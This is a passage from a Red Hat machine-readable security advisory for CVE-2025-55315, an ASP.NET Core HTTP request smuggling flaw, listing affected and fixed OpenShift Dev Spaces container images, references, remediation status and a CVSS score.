"text": "A flaw was found in ASP.NET Core\u2019s HTTP request handling that leads to inconsistent interpretation of specially crafted HTTP requests. This mismatch can be abused by an authorized network attacker to smuggle or manipulate request boundaries, allowing bypass of security controls or unintended forwarding of request data.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dotnet: .NET Security Feature Bypass Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team has assessed this issue as Important. An authorized network attacker can exploit inconsistent HTTP request parsing in ASP.NET Core to bypass security controls (HTTP request smuggling), potentially exposing or enabling unauthorized actions on request data in affected .NET runtimes.\n\n```\n\n.NET 6.0 for RHEL-8, RHEL-9 and RHIVOS has reached its End of Life as of November 12, 2024, and is no longer supported. No fixes will be provided for this stream. For additional information about lifecycle for .NET on Red Hat Enterprise Linux, please refer to: https://access.redhat.com/support/policy/updates/net-core.\n\n```",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55315"
},
{
"category": "external",
"summary": "RHBZ#2403085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403085"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55315"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55315",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55315"
}
],
"release_date": "2025-10-15T12:58:31.281000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
